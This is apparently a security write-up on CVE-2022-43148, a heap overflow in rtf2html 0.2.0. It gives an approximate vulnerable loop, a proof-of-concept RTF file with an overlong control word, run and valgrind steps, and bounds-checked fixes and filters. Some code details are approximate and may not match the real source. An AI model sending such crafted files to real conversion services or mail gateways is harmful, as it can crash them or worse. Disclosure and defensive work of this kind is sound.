Discovered: 2022  
Component: rtf2html v0.2.0  
Vulnerability: Heap Buffer Overflow  
Affected File: /rtf2html/./rtf_tools.h  
CVE: CVE-2022-43148

Introduction

Document converters rarely get attention from security professionals, but vulnerabilities in them can have serious impact, especially when they run behind online conversion services or email gateways. In October 2022, a heap buffer overflow was disclosed in the open-source rtf2html version 0.2.0, in its header file rtf_tools.h. This article breaks down how the vulnerability can be triggered and what exploitation could look like, with a hands-on walkthrough and actionable fixes.

About rtf2html

rtf2html is a lightweight open-source utility that converts RTF (Rich Text Format) files to HTML. It is written in C and, due to its simplicity, is popular for server-side transformations. Version 0.2.0, however, suffers from a heap buffer overflow in its RTF token parsing logic.

The Vulnerability at a Glance

The core issue lies in the way rtf2html parses RTF tokens in /rtf2html/./rtf_tools.h. The vulnerable code fails to validate the size of input before copying it into a heap-allocated buffer, allowing a malformed RTF file to overwrite memory in the heap after the end of the buffer.

The vulnerable code looks something like this (from rtf_tools.h):

char *buffer = (char *)malloc(BUFFER_SIZE);
...
for (int i = 0; i < input_length; i++) {
    buffer[i] = input[i]; // No check if input_length > BUFFER_SIZE
}

There is no check that input_length stays within BUFFER_SIZE. If an attacker supplies a longer input, the loop keeps writing past the end of the buffer and overwrites adjacent heap memory.
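To make the effect concrete, here is a minimal sketch in C that replays the same unchecked loop inside a flat array the program owns, so nothing is actually corrupted. The sizes BUFFER_SIZE = 16 and NEIGHBOR_SIZE = 8 and the function name simulate_unchecked_copy are assumptions chosen for illustration; they do not come from the rtf2html source.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define BUFFER_SIZE   16  /* hypothetical; the real value is not given in this article */
#define NEIGHBOR_SIZE 8   /* hypothetical stand-in for the adjacent heap chunk */

/* Replays the unchecked copy inside one flat arena so the "overflow" stays in
 * memory we own. Returns how many neighbor bytes were overwritten.
 * Assumes the input bytes are non-zero so that changes are detectable. */
size_t simulate_unchecked_copy(const char *input, size_t input_length)
{
    char arena[BUFFER_SIZE + NEIGHBOR_SIZE];
    char *buffer = arena;                        /* first BUFFER_SIZE bytes */
    const char *neighbor = arena + BUFFER_SIZE;  /* bytes right after the buffer */

    assert(input != NULL);
    assert(input_length <= sizeof arena);        /* keep the demo itself in bounds */

    memset(arena, 0, sizeof arena);
    for (size_t i = 0; i < input_length; i++) {
        buffer[i] = input[i];                    /* same unchecked write as above */
    }

    size_t clobbered = 0;
    for (size_t i = 0; i < NEIGHBOR_SIZE; i++) {
        if (neighbor[i] != 0) {
            clobbered++;
        }
    }
    return clobbered;
}
```

With these sizes, a 20-byte input overwrites 4 neighbor bytes (input_length minus BUFFER_SIZE), while a 4-byte input overwrites none. In the real program those neighbor bytes would belong to whatever the allocator placed next to the buffer.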

Attack Scenario

An attacker creates a malicious .rtf file with an overly long token or control sequence. When rtf2html processes this document, it copies the large input into a small buffer, leading to memory corruption.

If rtf2html is used in an automated system (e.g., a mail gateway or document conversion SaaS), this could result in a denial of service (segfault/crash) or, in advanced exploits, remote code execution if the heap is manipulated carefully.
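For automated pipelines, one possible stopgap is to screen files before they reach the converter. The sketch below, in C, measures the longest control word in an RTF byte stream and flags anything above 32 letters, which is the limit the RTF specification sets for control word names. The function names and the RTF_MAX_CONTROL_WORD constant are hypothetical, and the check only covers the overlong-control-word pattern used in this article, not every input that might trigger the bug.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

#define RTF_MAX_CONTROL_WORD 32  /* assumed limit, taken from the RTF specification */

/* Returns the length of the longest run of letters that directly follows a
 * backslash. Control symbols such as \\ or \{ count as length 0. */
size_t longest_control_word(const char *data, size_t len)
{
    size_t longest = 0;
    size_t i = 0;

    assert(data != NULL);
    while (i < len) {
        if (data[i] != '\\') {
            i++;
            continue;
        }
        i++;  /* skip the backslash */
        size_t run = 0;
        while (i < len && isalpha((unsigned char)data[i])) {
            run++;
            i++;
        }
        if (run == 0 && i < len) {
            i++;  /* control symbol: skip the escaped character */
        }
        if (run > longest) {
            longest = run;
        }
    }
    return longest;
}

/* Returns 1 if the document should be rejected before conversion, else 0. */
int has_oversized_control_word(const char *data, size_t len)
{
    return longest_control_word(data, len) > RTF_MAX_CONTROL_WORD;
}
```

A gateway could call has_oversized_control_word on the uploaded bytes and refuse the file when it returns 1. This is a filter in front of the vulnerable code, not a replacement for fixing it.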

Step-by-Step Exploit

Let's look at a minimal PoC (Proof-Of-Concept) exploit.

Step 1: Create an RTF file with an excessively long group or control word

{\rtf1\ansi\deff0{\fonttbl{\f0\fswiss Helvetica;}}
\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
}

The long run of "a" characters forms a single oversized control word, which is intended to exceed the fixed-size buffer rtf2html uses while parsing tokens.
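Typing the file by hand makes it awkward to vary the token length, so a small generator helps when testing different sizes. The following C sketch builds the same kind of document in memory with a control word of any requested length. The function name build_long_control_word_rtf is hypothetical, and the header assumes the default font index is 0.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Fills out with an RTF document whose body is one control word made of
 * word_len letters. Returns the document length (excluding the '\0'),
 * or 0 if out is too small to hold it. */
size_t build_long_control_word_rtf(char *out, size_t out_size, size_t word_len)
{
    static const char header[] =
        "{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0\\fswiss Helvetica;}}\n\\";
    static const char footer[] = "\n}\n";
    const size_t header_len = sizeof header - 1;
    const size_t footer_len = sizeof footer - 1;

    assert(out != NULL);
    /* Bounds check first; written as subtraction so it cannot wrap around. */
    if (out_size < header_len + footer_len + 1 ||
        word_len > out_size - header_len - footer_len - 1) {
        return 0;
    }

    memcpy(out, header, header_len);
    memset(out + header_len, 'a', word_len);   /* the oversized control word */
    memcpy(out + header_len + word_len, footer, footer_len);
    out[header_len + word_len + footer_len] = '\0';
    return header_len + word_len + footer_len;
}
```

The returned length can be passed to fwrite to save the document as malicious.rtf. Note that the generator validates its own output size before copying, which is exactly the check the vulnerable loop lacks.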

Step 2: Run the rtf2html binary on the file (assuming it is built in the current directory)

./rtf2html malicious.rtf output.html

This will likely crash. Running the same command under a memory debugger such as valgrind shows why:

valgrind ./rtf2html malicious.rtf output.html

You'll see a report similar to:

==1234== Invalid write of size 1
==1234==    at 0x401234: main (rtf2html.c:56)
==1234==  Address 0x520404 is 0 bytes after a block of size 1024 alloc'd

Step 3: Exploiting Further

An advanced attacker could carefully craft the overflowing data to overwrite function pointers, neighboring objects, or allocator metadata, possibly leading to arbitrary code execution. Whether this succeeds depends on how glibc or the malloc implementation in use lays out and protects the heap.

Fixing the Vulnerability

The best mitigation is to ensure input length never exceeds buffer length before copying.

Patched Code Example

// Clamp the copy to the buffer size; any excess input is dropped
int bytes_to_copy = input_length > BUFFER_SIZE ? BUFFER_SIZE : input_length;
for (int i = 0; i < bytes_to_copy; i++) {
    buffer[i] = input[i];
}

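Alternatively, use memcpy_s where the toolchain provides it (it is part of the optional C11 Annex K), or memcpy with an explicitly clamped length. Avoid relying on strncpy alone: it stops at the given size but does not null-terminate the result when the input is truncated.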
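Clamping silently truncates the token, which may produce confusing output later in the conversion. Another option is to reject oversized input and let the caller decide what to do. The sketch below shows that approach in C; copy_token_checked and its parameters are hypothetical names, not functions from rtf2html.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copies input into buffer and null-terminates it.
 * Returns 0 on success, or -1 if the input (plus the terminator) does not fit,
 * in which case buffer is left untouched. */
int copy_token_checked(char *buffer, size_t buffer_size,
                       const char *input, size_t input_length)
{
    assert(buffer != NULL && input != NULL);

    /* ">=" reserves one byte for the terminating '\0' */
    if (input_length >= buffer_size) {
        return -1;
    }
    memcpy(buffer, input, input_length);
    buffer[input_length] = '\0';
    return 0;
}
```

A caller would check the return value and abort the conversion, or grow the buffer and retry, instead of continuing with corrupted memory.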

Conclusion

Heap overflows are a classic but still very real threat for C programs like rtf2html. CVE-2022-43148 demonstrates that even innocuous utilities can open doors to attackers if unsafe memory operations remain unchecked. If you use rtf2html, *upgrade as soon as a patched version becomes available* or apply bounds checking yourself. Don’t let your server become an attacker’s playground.

Timeline

Published on: 10/31/2022 19:15:00 UTC
Last modified on: 11/01/2022 19:01:00 UTC